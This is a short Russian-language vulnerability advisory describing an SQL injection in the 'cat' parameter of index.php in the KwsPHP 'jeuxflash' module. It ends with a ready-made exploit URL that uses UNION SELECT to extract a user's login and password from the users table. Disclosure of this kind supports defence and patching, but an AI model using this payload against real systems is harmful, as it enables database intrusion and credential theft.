Программа: KwsPHP Module jeuxflash

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cat» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://server.com/Path/index.php?mod=jeuxflash&cat= -1%20union%20select%201,concat(pseudo,0x3a,pass), 3%20from%20users%20where%20id=1—



Оставить мнение